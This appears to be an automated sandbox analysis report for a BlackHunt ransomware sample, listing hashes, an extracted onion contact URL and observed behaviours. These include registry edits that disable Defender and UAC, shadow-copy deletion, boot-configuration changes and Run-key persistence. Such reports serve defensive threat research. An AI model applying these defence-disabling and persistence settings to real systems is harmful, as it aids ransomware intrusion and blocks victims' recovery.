Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
171s -
max time network
188s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:19
Static task
static1
Behavioral task
behavioral1
Sample
9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
Resource
win10v2004-20231215-en
General
-
Target
9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe
-
Size
707KB
-
MD5
0d0f097a0fb4ee1fa6fa1ef654c98d64
-
SHA1
38dc10e381d26c47499a427508297b150b5abf71
-
SHA256
9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1
-
SHA512
5239ca5a72b6af0379a14dec7a0b013e93a3eddbd17b7a67aeaf0a966b4b1a6c8446acc0270be25d50de409839f957b8f29fc1c852aace43ce49de88753ef20c
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1L8Mvnh:6uaTmkZJ+naie5OTamgEoKxLWaSh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4348 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4744 bcdedit.exe 1568 bcdedit.exe -
Renames multiple (593) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 4452 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\W: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\I: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\L: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\B: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\O: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\P: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\R: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\T: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\M: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\J: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\Z: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\Y: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\U: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\K: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\E: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\H: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\X: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\V: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\A: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\S: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened (read-only) \??\N: 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\lib\packager.jar 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_ReadMe.hta 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#BlackHunt_ReadMe.hta 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\el\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_sv.properties 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management\snmp.acl.template 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#BlackHunt_ReadMe.hta 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\dotnet\shared\#BlackHunt_ReadMe.hta 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaSansRegular.ttf 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\libxml2.md 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\limited\US_export_policy.jar 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_ReadMe.hta 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\directshow.md 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\de\#BlackHunt_ReadMe.hta 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#BlackHunt_ReadMe.txt 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\Java\jdk-1.8\include\win32\#BlackHunt_ReadMe.hta 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\zlib.md 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\joni.md 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\xerces.md 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\jfxrt.jar 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jpeg.md 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jvisualvm.txt 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\Java\jdk-1.8\lib\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\CIEXYZ.pf 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\localedata.jar 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jce.jar 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#BlackHunt_ReadMe.hta 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_ReadMe.hta 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\CompareReceive.eps 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterRegular.ttf 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\Java\jdk-1.8\legal\jdk\#BlackHunt_ReadMe.hta 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\asm.md 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\tzdb.dat 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#BlackHunt_ReadMe.txt 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#BlackHunt_ReadMe.txt 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\charsets.jar 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\jfr\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\an\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#BlackHunt_ReadMe.txt 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\7-Zip\7z.sfx 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\dotnet\ThirdPartyNotices.txt 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_Private.key 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_MoveDrop32x32.gif 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfr.jar 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe File created C:\Program Files\VideoLAN\VLC\locale\is\#BlackHunt_ReadMe.txt 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4864 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1600 vssadmin.exe 3404 vssadmin.exe 3084 vssadmin.exe 3312 vssadmin.exe 468 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe Token: SeRestorePrivilege 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe Token: SeBackupPrivilege 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe Token: SeTakeOwnershipPrivilege 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe Token: SeAuditPrivilege 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe Token: SeSecurityPrivilege 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe Token: SeIncBasePriorityPrivilege 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe Token: SeBackupPrivilege 3100 vssvc.exe Token: SeRestorePrivilege 3100 vssvc.exe Token: SeAuditPrivilege 3100 vssvc.exe Token: SeBackupPrivilege 5816 wbengine.exe Token: SeRestorePrivilege 5816 wbengine.exe Token: SeSecurityPrivilege 5816 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1968 wrote to memory of 1244 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 172 PID 1968 wrote to memory of 1244 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 172 PID 1244 wrote to memory of 1060 1244 reg.exe 91 PID 1244 wrote to memory of 1060 1244 reg.exe 91 PID 1968 wrote to memory of 3800 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 213 PID 1968 wrote to memory of 3800 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 213 PID 1968 wrote to memory of 3328 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 211 PID 1968 wrote to memory of 3328 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 211 PID 1968 wrote to memory of 1456 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 95 PID 1968 wrote to memory of 1456 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 95 PID 1968 wrote to memory of 5072 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 93 PID 1968 wrote to memory of 5072 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 93 PID 1968 wrote to memory of 3232 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 97 PID 1968 wrote to memory of 3232 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 97 PID 3800 wrote to memory of 3644 3800 cmd.exe 209 PID 3800 wrote to memory of 3644 3800 cmd.exe 209 PID 3328 wrote to memory of 1676 3328 cmd.exe 98 PID 3328 wrote to memory of 1676 3328 cmd.exe 98 PID 1968 wrote to memory of 864 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 208 PID 1968 wrote to memory of 864 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 208 PID 1968 wrote to memory of 4272 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 207 PID 1968 wrote to memory of 4272 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 207 PID 1968 wrote to memory of 964 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 206 PID 1968 wrote to memory of 964 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 206 PID 1968 wrote to memory of 4440 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 204 PID 1968 wrote to memory of 4440 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 204 PID 1456 wrote to memory of 1628 1456 cmd.exe 203 PID 1456 wrote to memory of 1628 1456 cmd.exe 203 PID 5072 wrote to memory of 3984 5072 cmd.exe 102 PID 5072 wrote to memory of 3984 5072 cmd.exe 102 PID 1968 wrote to memory of 2408 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 202 PID 1968 wrote to memory of 2408 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 202 PID 1968 wrote to memory of 2692 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 105 PID 1968 wrote to memory of 2692 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 105 PID 1968 wrote to memory of 5008 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 201 PID 1968 wrote to memory of 5008 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 201 PID 1968 wrote to memory of 2132 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 200 PID 1968 wrote to memory of 2132 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 200 PID 1968 wrote to memory of 3844 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 107 PID 1968 wrote to memory of 3844 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 107 PID 1968 wrote to memory of 3932 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 197 PID 1968 wrote to memory of 3932 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 197 PID 3232 wrote to memory of 4492 3232 cmd.exe 108 PID 3232 wrote to memory of 4492 3232 cmd.exe 108 PID 4440 wrote to memory of 2884 4440 cmd.exe 164 PID 4440 wrote to memory of 2884 4440 cmd.exe 164 PID 1968 wrote to memory of 468 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 194 PID 1968 wrote to memory of 468 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 194 PID 1968 wrote to memory of 916 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 192 PID 1968 wrote to memory of 916 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 192 PID 4272 wrote to memory of 2976 4272 cmd.exe 110 PID 4272 wrote to memory of 2976 4272 cmd.exe 110 PID 1968 wrote to memory of 2164 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 190 PID 1968 wrote to memory of 2164 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 190 PID 1968 wrote to memory of 3412 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 189 PID 1968 wrote to memory of 3412 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 189 PID 1968 wrote to memory of 2304 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 188 PID 1968 wrote to memory of 2304 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 188 PID 864 wrote to memory of 1092 864 cmd.exe 186 PID 1968 wrote to memory of 4980 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 185 PID 864 wrote to memory of 1092 864 cmd.exe 186 PID 1968 wrote to memory of 4980 1968 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe 185 PID 964 wrote to memory of 4912 964 cmd.exe 112 PID 964 wrote to memory of 4912 964 cmd.exe 112 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
